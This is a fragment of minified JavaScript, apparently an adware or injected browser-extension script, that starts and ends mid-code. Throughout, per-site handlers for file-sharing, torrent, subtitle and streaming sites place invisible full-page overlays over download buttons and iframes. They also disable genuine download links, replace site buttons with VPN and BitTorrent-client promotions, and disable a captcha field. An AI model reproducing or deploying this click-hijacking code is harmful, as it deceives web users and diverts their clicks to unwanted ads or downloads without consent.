r=document.createElement(\"div\");r.style.position=\"absolute\";r.style.left=0;r.style.top=0;r.style.width=\"100%\";r.style.height=\"100%\";r.style.zIndex=\"9999\";r.style.cursor=\"pointer\";t.appendChild(r)}}}catch(u){}l=document.getElementsByTagName(\"iframe\");for(k=0;k<l.length;k++)try{-1==l[k].src.indexOf(\"acebook.co\")&&-1==l[k].src.indexOf(\"cp.crwdcntrl.ne\")&&\n(t=l[k].parentNode,t.style.position=\"relative\",r=document.createElement(\"div\"),r.style.position=\"absolute\",r.style.left=0,r.style.top=0,r.style.width=\"100%\",r.style.height=\"100%\",r.style.zIndex=\"9999\",r.style.cursor=\"pointer\",r.id=k,t.appendChild(r))}catch(w){}}20<h&&clearInterval(e)},500)}};this[\"pensubtitles.us\"]=new function(){this.init=function(){if(-1<window.location.href.indexOf(\"/opensubtitles-playe\")){var h=document.getElementById(\"divPlayerDesc\");if(null!=h){h.style.position=\"relative\";var e=\ndocument.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.zIndex=\"2000\";h.appendChild(e);if(h=h.children[0]){var k=h.children[0];k&&(k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\"))}}h=document.getElementById(\"divPlayerHead\");if(null!=h)for(var l=0;l<h.children.length;l++)if(\"span\"==h.children[l].tagName.toLowerCase()){var m=h.children[l],e=document.createElement(\"div\");e.style.position=\n\"absolute\";e.style.width=\"106%\";e.style.height=\"70px\";e.style.cursor=\"pointer\";e.style.top=\"-50px\";e.style.left=\"-6%\";e.style.zIndex=\"2000\";if(k=m.children[0])k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\");m.style.position=\"relative\";m.appendChild(e)}}}};this[\"opensubtitles.org\"]=new function(){this.init=function(){new function(){var h=document.getElementById(\"scrubbuad\");h&&(h.style.zIndex=\"15\",f=document.createElement(\"div\"),f.style.zIndex=\"15000\",f.style.right=\"9px\",\nf.style.bottom=\"0\",f.style.position=\"fixed\",f.style.padding=\"0\",f.style.margin=\"0 0 30px 0\",f.style.width=\"220px\",f.style.height=\"72px\",f.style.overflow=\"visible\",f.style.cursor=\"pointer\",document.getElementsByTagName(\"body\")[0].firstChild.appendChild(f));var e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width:100%;\"] td');0==e.length&&(e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width: 100%;\"] td'));for(h=0;h<e.length;h++){var k=n.utils.duplicateElement(e[h]),\nl=e[h].parentNode;l.insertBefore(k,e[h]);l.removeChild(e[h])}e=n.utils.query_selector_all('div[style=\"margin-left: 110px;\"] fieldset div[style=\"text-align: left\"] a');0==e.length&&(e=n.utils.query_selector_all('div[style=\"margin-left: 110px;\"] fieldset div[style=\"text-align: left;\"] a'));for(h=0;h<e.length;h++)k=n.utils.duplicateElement(e[h]),l=e[h].parentNode,l.insertBefore(k,e[h]),l.removeChild(e[h]);e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width:100%;border-spacing: 1px;\"] td');\n0==e.length&&(e=n.utils.query_selector_all('div[style=\"clear: both;\"] fieldset table[style=\"width: 100%; border-spacing: 1px;\"] td'));for(h=0;h<e.length;h++)k=n.utils.duplicateElement(e[h]),l=e[h].parentNode,l.insertBefore(k,e[h]),l.removeChild(e[h])}}};this[\"romptfile.co\"]=new function(){this.init=function(){if(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var h={},e=document.getElementsByTagName(\"iframe\"),k=0;k<e.length;k++)\"300\"==e[k].getAttribute(\"width\")&&\"250\"==e[k].getAttribute(\"height\")&&\n(h=e[k].parentNode);h.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";h.appendChild(d)}}};this[\"pensoftwareupdater.co\"]=new function(){this.init=function(){new function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==typeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var h=$(\".download\").parent();\nh.css(\"position\",\"relative\");var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.zIndex=\"2000\";e.style.height=\"100%\";e.style.width=\"122px\";e.style.right=\"0\";e.style.top=\"0\";e.style.cursor=\"pointer\";h.append(e);h=$(\"#addBoxX\").parent();h.css(\"position\",\"relative\");e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.zIndex=\"2000\";e.style.height=\"45px\";e.style.width=\"101px\";e.style.right=\"22px\";e.style.bottom=\"16px\";e.style.cursor=\"pointer\";h.append(e);window.__qqcount++;\n10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var h=document.links,e={},k={},l=0;l<h.length;l++)e=h[l].getAttribute(\"href\"),null!=e&&-1<e.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(e=h[l].getAttribute(\"id\"),null!=e&&\"addBoxX\"==e?(k=h[l].parentNode,k.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.zIndex=\"2000\",e.style.height=\"45px\",e.style.width=\"101px\",e.style.right=\"22px\",e.style.bottom=\"16px\"):(k=h[l].parentNode,\nk.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.zIndex=\"2000\",e.style.height=\"100%\",e.style.width=\"122px\",e.style.right=\"0\",e.style.top=\"0\"),e.style.cursor=\"pointer\",k.appendChild(e))}}};this[\"veehd.com\"]=new function(){this.init=function(){new function(){if(-1<window.location.href.indexOf(\"veehd.com/video/\")){var h=document.getElementsByTagName(\"iframe\")[0],e={};null!=h&&(h=h.parentNode,e=document.createElement(\"div\"),e.style.top=\"0\",e.style.width=\n\"100%\",e.style.height=\"100%\",e.style.cursor=\"pointer\",e.style.zIndex=\"2000\",e.style.position=\"absolute\",h.style.position=\"relative\",h.appendChild(e));h=document.getElementById(\"preview\");null!=h&&(e=document.createElement(\"div\"),e.style.top=\"0\",e.style.width=\"100%\",e.style.height=\"100%\",e.style.cursor=\"pointer\",e.style.zIndex=\"2000\",e.style.position=\"absolute\",h.style.position=\"relative\",h.appendChild(e))}else for(var e=document.getElementsByTagName(\"a\"),k=0;k<e.length;k++)if(\"getDownload();\"==e[k].getAttribute(\"onclick\")){h=\ndocument.createElement(\"a\");h.style.cursor=\"pointer\";var l=document.createElement(\"img\");l.setAttribute(\"src\",e[k].children[0].getAttribute(\"src\"));l.setAttribute(\"border\",\"0\");h.appendChild(l);l=e[k].parentNode;l.removeChild(e[k]);e=l.getElementsByTagName(\"div\")[0];l.insertBefore(h,e);break}}}};this[\"ullypcgames.ne\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var h=document.getElementsByTagName(\"center\"),e=0;e<h.length;e++){var k=h[e].firstChild;\n\"undefined\"!==typeof k.tagName&&\"a\"==k.tagName.toLowerCase()&&(h[e].style.position=\"relative\",k=document.createElement(\"div\"),k.style.position=\"absolute\",k.style.top=\"0\",k.style.left=\"0\",k.style.width=\"100%\",k.style.height=\"100%\",k.style.zIndex=\"2000\",k.style.cursor=\"pointer\",h[e].appendChild(k))}}};this[\"llplayer.com.b\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++)if(h[e].getAttribute(\"src\")&&\n-1<h[e].getAttribute(\"src\").indexOf(\"fullpage_eng.png\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor=\"pointer\";var l=h[e].parentNode.parentNode;l.style.position=\"relative\";l.appendChild(k)}}};this[\"ubtitulosespanol.or\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var h=document.links;for(i=0;i<h.length;i++)if(\"Descargue su subt\\u00edtulo aqu\\u00ed\"===\n(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"ubtitles4free.ne\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var h=document.links;for(i=0;i<h.length;i++)if(\"Download Subtitle\"===(h[i].innerText?\nh[i].innerText:h[i].textContent)||\"Download Player\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"legendasbrasil.org\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"legendasbrasil.org\")){var h=document.links;\nfor(i=0;i<h.length;i++)if(\"Baixar Legenda\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Baixar Player\"===(h[i].innerText?h[i].innerText:h[i].textContent)||\"Baixe sua legenda aqui\"===(h[i].innerText?h[i].innerText:h[i].textContent)){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"reeroms.co\"]=\nnew function(){this.init=function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var h=document.getElementsByTagName(\"a\"),e=0;e<h.length;e++){var k=\"undefined\"===typeof h[e].innerText?h[e].textContent:h[e].innerText,k=k.trim();if(\"Download\"===k||0==k.indexOf(\"Direct\")){var l=document.createElement(\"div\");l.style.width=\"100%\";l.style.height=\"100%\";l.style.position=\"absolute\";l.style.zIndex=\"9999\";\nl.style.top=\"0\";l.style.cursor=\"pointer\";var m=h[e].parentNode;m.style.position=\"relative\";m.appendChild(l);0==k.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))}};this[\"eneral-ebooks.co\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var h=document.getElementsByTagName(\"iframe\"),e=0;e<h.length;e++){var k=h[e].parentNode;if(null!=\nk){var l=k.getAttribute(\"class\");null!=l&&-1<l.indexOf(\"banner-body\")&&(l=document.createElement(\"div\"),l.style.width=\"100%\",l.style.height=\"100%\",l.style.position=\"absolute\",l.style.zIndex=\"9999\",l.style.top=\"0\",l.style.cursor=\"pointer\",k.style.position=\"relative\",k.appendChild(l))}}}};this[\"stream2watch.me\"]=new function(){this.init=function(){-1<location.host.toLowerCase().indexOf(\"stream2watch.me\")&&(window.__z_tream2count=0,window.__z_tream2int=setInterval(function(){20<window.__z_tream2count++&&\nclearInterval(window.__z_tream2int);var h=document.getElementById(\"rh_toolbar_STRTOPB\"),e=document.getElementById(\"rhfrm_STRTOPB\");if(null!=h&&null!=e){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";h.appendChild(k);e.style.position=\"absolute\";e.style.zIndex=\"-1\";clearInterval(window.__z_tream2int)}},500))}};this[\"old_ki_ckass.to\"]=new function(){var h=this;h.init=function(){location.protocol+\n\"//\"+window.location.host+\"/\"!=window.location.href&&(h.counter=0,h.kickass=function(){20<++h.counter&&clearInterval(h.interval);var e=n.utils.query_selector_all(\".advertDownload\");if(0<e.length){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";k.style.top=\"0\";k.style.left=\"0\";e[0].appendChild(k);e[0].style.position=\"relative\";e[0].style.overflow=\"hidden\";e=e[0].getElementsByTagName(\"a\");for(k=\n0;k<e.length;k++)e[k].setAttribute(\"href\",\"javascript:void(0);\"),e[k].setAttribute(\"onclick\",\"void(0);\");clearInterval(h.interval)}},h.interval=setInterval(h.kickass,500))}};this[\"kickass.to\"]=new function(){var h=this;h.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){h.counter=0;h.___ZskskskCount=0;h.___ZskskskthisZ=function(){try{20<++h.___ZskskskCount&&clearInterval(h.___ZskskskInter);for(var e=document.getElementsByTagName(\"div\"),k=0;k<e.length;k++){var l=\ne[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=e[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";var p=document.createElement(\"span\");p.innerText?p.innerText=\"Protect yourself now with hide.me VPN\":p.textContent=\"Protect yourself now with hide.me VPN\";n.appendChild(p);e[k].removeChild(m);e[k].appendChild(n);\nclearInterval(h.___ZskskskInter)}}}}catch(v){clearInterval(h.___ZskskskInter)}};h.___ZskskskInter=setInterval(h.___ZskskskthisZ,500);for(var e=n.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<e.length;k++){var l=e[k].nextSibling,m=document.createElement(\"a\");m.className=\"partner1Button idownload icon16\";m.setAttribute(\"href\",\"#\");var p=document.createElement(\"span\");m.appendChild(p);p=e[k].parentNode;l?p.insertBefore(m,l):p.appendChild(m);p.removeChild(e[k])}h.counter=0;h.kickassx=\nfunction(){20<++h.counter&&clearInterval(h.interval);0<n.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',clearInterval(h.interval))};h.interval=setInterval(h.kickassx,500);h.counterClick=0;h.kickassClick=function(){20<++h.counterClick&&clearInterval(h.interval2);var e=n.utils.query_selector_all(\".block.botmarg5px\")[0];e&&\n\"Download faster CLICK HERE\"==(e.innerText?e.innerText:e.textContent)&&(e.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"kickass.so\"]=new function(){var h=this;h.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){h.counter=0;h.___ZskskskCount=0;h.___ZskskskthisZ=function(){try{20<++h.___ZskskskCount&&clearInterval(h.___ZskskskInter);for(var e=\ndocument.getElementsByTagName(\"div\"),k=0;k<e.length;k++){var l=e[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=e[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";var p=document.createElement(\"span\");p.innerText?p.innerText=\"Protect yourself now with hide.me VPN\":p.textContent=\"Protect yourself now with hide.me VPN\";\nn.appendChild(p);e[k].removeChild(m);e[k].appendChild(n);clearInterval(h.___ZskskskInter)}}}}catch(v){clearInterval(h.___ZskskskInter)}};h.___ZskskskInter=setInterval(h.___ZskskskthisZ,500);for(var e=n.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<e.length;k++){var l=e[k].nextSibling,m=document.createElement(\"a\");m.className=\"partner1Button idownload icon16\";m.setAttribute(\"href\",\"#\");var p=document.createElement(\"span\");m.appendChild(p);p=e[k].parentNode;l?p.insertBefore(m,l):\np.appendChild(m);p.removeChild(e[k])}h.counter=0;h.kickassx=function(){20<++h.counter&&clearInterval(h.interval1);0<n.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',clearInterval(h.interval1))};h.interval1=setInterval(h.kickassx,500);h.counterClick=0;h.kickassClick=function(){20<++h.counterClick&&clearInterval(h.interval2);\nvar e=n.utils.query_selector_all(\".block.botmarg5px\")[0];e&&\"Download faster CLICK HERE\"==(e.innerText?e.innerText:e.textContent)&&(e.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"uploadrocket.net\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".dlbutton_green\");if(h&&0<h.length){var h=h[0],e=document.createElement(\"a\");e.className=\"dlbutton_green\";\ne.setAttribute(\"href\",\"javascript:void(0)\");var k=document.createElement(\"span\");k.innerText?k.innerText=\"Download Now\":k.textContent=\"Download Now\";e.appendChild(k);k=h.parentNode;k.removeChild(h);k.appendChild(e)}(h=n.utils.query_selector_all(\".middle\"))&&0<h.length&&(h=h[0].children[4])&&h.setAttribute(\"href\",\"javascript:void(0);\");if((h=n.utils.query_selector_all(\"#ID_freeorpremium table tr td a\"))&&0<h.length)for(e=0;e<h.length;e++)h[e].setAttribute(\"href\",\"javascript:void(0);\");(h=n.utils.query_selector_all(\"#ID_freeorpremium input[type='submit']\"))&&\n0<h.length&&h[0].setAttribute(\"type\",\"button\");(h=n.utils.query_selector_all(\"#ID_freeorpremium\"))&&0<h.length&&(h=h[0])&&(h.style.position=\"relative\",e=document.createElement(\"div\"),e.style.position=\"absolute\",e.style.width=\"100%\",e.style.height=\"95px\",e.style.zIndex=\"2000\",e.style.top=\"0\",e.style.cursor=\"pointer\",h.appendChild(e))}};this[\"programas-gratis.net\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".list.new .download_button\"),e=0;e<h.length;e++){var k=h[e].parentNode;\nk.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"124px\";l.style.height=\"42px\";l.style.zIndex=\"2000\";l.style.top=\"44px\";l.style.right=\"9px\";l.style.cursor=\"pointer\";k.appendChild(l);h[e].setAttribute(\"href\",\"javascript:void(0)\")}}};this[\"programasgratis.es\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\"#bloque_top_portada .programa_top_portada a\"),e=0;e<h.length;e++)if(h[e].setAttribute(\"href\",\"javascript:void(0)\"),\n\"rojo\"!=h[e].className){var k=h[e].parentNode;k.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"100%\";l.style.height=\"152px\";l.style.zIndex=\"2000\";l.style.top=\"0\";l.style.right=\"0\";l.style.cursor=\"pointer\";k.appendChild(l)}h=n.utils.query_selector_all(\".bloque_novedades .link_categoria_descargar\");for(e=0;e<h.length;e++)k=h[e].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\n\"124px\",l.style.height=\"42px\",l.style.zIndex=\"2000\",l.style.top=\"-5px\",l.style.right=\"0\",l.style.cursor=\"pointer\",k.appendChild(l),h[e].setAttribute(\"href\",\"javascript:void(0)\")}};this[\"programasejogos.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".enlace_pestania_descargar\"),e=0;e<h.length;e++){var k=h[e].parentNode;k.style.position=\"relative\";var l=document.createElement(\"span\");l.style.position=\"absolute\";l.style.width=\"200px\";l.style.height=\"90px\";l.style.zIndex=\n\"2000\";l.style.top=\"65px\";l.style.right=\"0\";l.style.cursor=\"pointer\";k.appendChild(l);h[e].setAttribute(\"href\",\"javascript:void(0)\")}h=[];h=h.concat(n.utils.query_selector_all(\".linea_fondo1 .enlace_pestania_descargar_pequeno\"));h=h.concat(n.utils.query_selector_all(\".linea_fondo1 .boton_clase_listado\"));h=h.concat(n.utils.query_selector_all(\".linea_fondo .enlace_pestania_descargar_pequeno\"));for(e=0;e<h.length;e++)for(var m=0;m<h[e].length;m++)k=h[e][m].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),\nl.style.position=\"absolute\",l.style.width=\"115px\",l.style.height=\"28px\",l.style.zIndex=\"2000\",l.style.top=\"0\",l.style.right=\"0\",l.style.cursor=\"pointer\",k.appendChild(l),h[e][m].setAttribute(\"href\",\"javascript:void(0)\");h=n.utils.query_selector_all(\".pyj_registro_inferior .enlace_pestania_descargar_pequeno\");for(e=0;e<h.length;e++)k=h[e].parentNode,k.style.position=\"relative\",l=document.createElement(\"span\"),l.style.position=\"absolute\",l.style.width=\"105px\",l.style.height=\"29px\",l.style.zIndex=\"2000\",\nl.style.top=\"3px\",l.style.right=\"-4px\",l.style.cursor=\"pointer\",k.appendChild(l),h[e].setAttribute(\"href\",\"javascript:void(0)\")}};this[\"uploading.com\"]=new function(){this.init=function(){if(window.self===window.top&&location.host.toLowerCase().indexOf(\"ploading.com/files/\"))for(var h=typeof document.querySelectorAll?document.getElementsByTagName(\"div\"):document.querySelectorAll(\"div.method_title\"),e=0;e<h.length;e++){var k=h[e].className;k&&\"undefined\"!==typeof k&&-1<k.indexOf(\"method_title\")&&(k=\nh[e].getAttribute(\"onclick\"))&&\"undefined\"!==typeof k&&-1<k.indexOf(\"location.href\")&&(h[e].setAttribute(\"onclick\",\"void(0);\"),k=h[e].cloneNode(!0),h[e].parentNode.replaceChild(k,h[e]),k.setAttribute(\"onclick\",\"void(0);\"))}setTimeout(function(){var e=n.utils.query_selector_all(\".method_title\")[0];if(e){var h=e.parentNode,k=document.createElement(\"div\");k.className=\"method_title\";var q=document.createElement(\"i\"),t=document.createElement(\"span\");t.setAttribute(\"id\",\"timer_count\");t.innerText=\"Download for free\";\nt.textContent=\"Download for free\";k.appendChild(q);k.appendChild(t);h.insertBefore(k,e);h.removeChild(e)}},1E3)}};this[\"flexydrive.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"media1fire.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all('input[name=\"adcopy_response\"]');\n0<h.length&&(h[0].disabled=!0);for(h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"softwareandgames.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"softwareandgames.com/download\")){var k=n.utils.duplicateElement(e),l=e.parentNode;\nl.insertBefore(k,e);l.removeChild(e)}}}};this[\"programmesetjeux.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"programmesetjeux.com/telecharger\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"baixarjogos.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<\nk.indexOf(\"baixarjogos.com/baixar\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"descargarjuegos.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"descargarjuegos.com/descargar\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"hotfiles.ro\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=\ndocument.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"hotfil.es/goref.php\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"vitanclub.net\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".pdld\")[0],e=n.utils.duplicateElement(h),k=h.parentNode;k.insertBefore(e,h);k.removeChild(h);h=document.getElementById(\"container_bottom\");n.utils.coverElement(h)}};this[\"mirrorcreator.com\"]=new function(){this.init=function(){for(var h=\n0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&(-1<k.indexOf(\"getsecuredfiles.com/mirrorc\")||-1<k.indexOf(\"westzip.in/\"))){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"mestorrents.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"pubted.com/www/delivery/\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,\ne);l.removeChild(e)}}}};this[\"vitorrent.net\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"/file.php\")){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"uploaded.net\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".free\")[0];if(\"undefined\"!==typeof h){var e=n.utils.duplicateElement(h);e.style.border=\"none\";var k=h.parentNode;k.insertBefore(e,\nh);k.removeChild(h)}h=n.utils.query_selector_all(\"#download .center\")[0];\"undefined\"!==typeof h&&n.utils.coverElement(h,void 0,\"130px\",void 0,void 0,void 0,void 0,!1)}};this[\"newsinitiative.org\"]=new function(){var h=this;h.init=function(){h.counter=0;h.interval=setInterval(function(){var e=n.utils.query_selector_all(\"noscript\")[1].parentNode;if(\"undefined\"!==typeof e){if(30>h.counter++){var k=e.children[0];if(\"undefined\"!==typeof k&&-1<k.getAttribute(\"src\").indexOf(\"data:image/\"))return}clearInterval(h.interval);\nvar k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}},500);var e=n.utils.query_selector_all(\".download-link a\");if(\"undefined\"!==typeof e)for(var k=0;k<e.length;k++){var l=n.utils.duplicateElement(e[k]),m=e[k].parentNode;m.insertBefore(l,e[k]);m.removeChild(e[k])}e=n.utils.query_selector_all(\".ads3 a\")[0];\"undefined\"!==typeof e&&(k=n.utils.duplicateElement(e),m=e.parentNode,m.insertBefore(k,e),m.removeChild(e))}};this[\"megafilmesonlinehd.com\"]=new function(){this.init=\nfunction(){var h=n.utils.query_selector_all(\"#ClickHere\")[0];if(\"undefined\"!==typeof h){var e=n.utils.duplicateElement(h),k=h.parentNode;k.insertBefore(e,h);k.removeChild(h)}}};this[\"mycoolmp3.com\"]=new function(){var h=this;h.init=function(){h.interval=setInterval(function(){if(\"undefined\"!==typeof n.utils.query_selector_all(\".downButtons\")[0]){var e=n.utils.query_selector_all(\".downButtons a\");if(!(2>e.length)&&(e=e[1],\"undefined\"!==typeof e)){var h=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(h,\ne);l.removeChild(e)}}},500)}};this[\"descargadictos.net\"]=new function(){var h=this;h.init=function(){h.counter=0;h.interval=setInterval(function(){var e=n.utils.query_selector_all(\".content\")[0].children[1];if(\"undefined\"!==typeof e){if(30>h.counter++){var k=e.firstChild;if(\"undefined\"!==typeof k&&-1<k.getAttribute(\"src\").indexOf(\"data:image/\"))return}clearInterval(h.interval);var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}},500);var e=n.utils.query_selector_all('[rel=\"nofollow\"]')[0];\nif(\"undefined\"!==typeof e){var k=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}};this[\"toggle.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".downloadLink.newDownloadLink a\")[0];if(\"undefined\"!==typeof h){var e=n.utils.duplicateElement(h),k=h.parentNode;k.insertBefore(e,h);k.removeChild(h)}}};this[\"downloadshareware.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\"a#ads\")[0];if(\"undefined\"!==typeof h){var e=\nn.utils.duplicateElement(h),k=h.parentNode;k.insertBefore(e,h);k.removeChild(h)}}};this[\"primewire.ag\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".quality_hd\");if(\"undefined\"!==typeof h)for(var e=0;e<h.length;e++){var k=h[e].parentNode.parentNode.children[1].children[0].children[0],l=n.utils.duplicateElement(k),m=k.parentNode;l.className=\"\";m.insertBefore(l,k);m.removeChild(k)}h=n.utils.query_selector_all(\".download_now_mouseover.no_c_link\")[0];\"undefined\"!==typeof h&&\n(l=n.utils.duplicateElement(h),m=h.parentNode,l.className=l.className.replace(\"no_c_link\",\"\"),m.insertBefore(l,h),m.removeChild(h));h=n.utils.query_selector_all(\".download_link .no_c_link\")[0];\"undefined\"!==typeof h&&(l=n.utils.duplicateElement(h),m=h.parentNode,l.className=l.className.replace(\"no_c_link\",\"\"),m.insertBefore(l,h),m.removeChild(h))}};this[\"ads.showmeflix.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".big-play\")[0];if(\"undefined\"!==typeof h){var 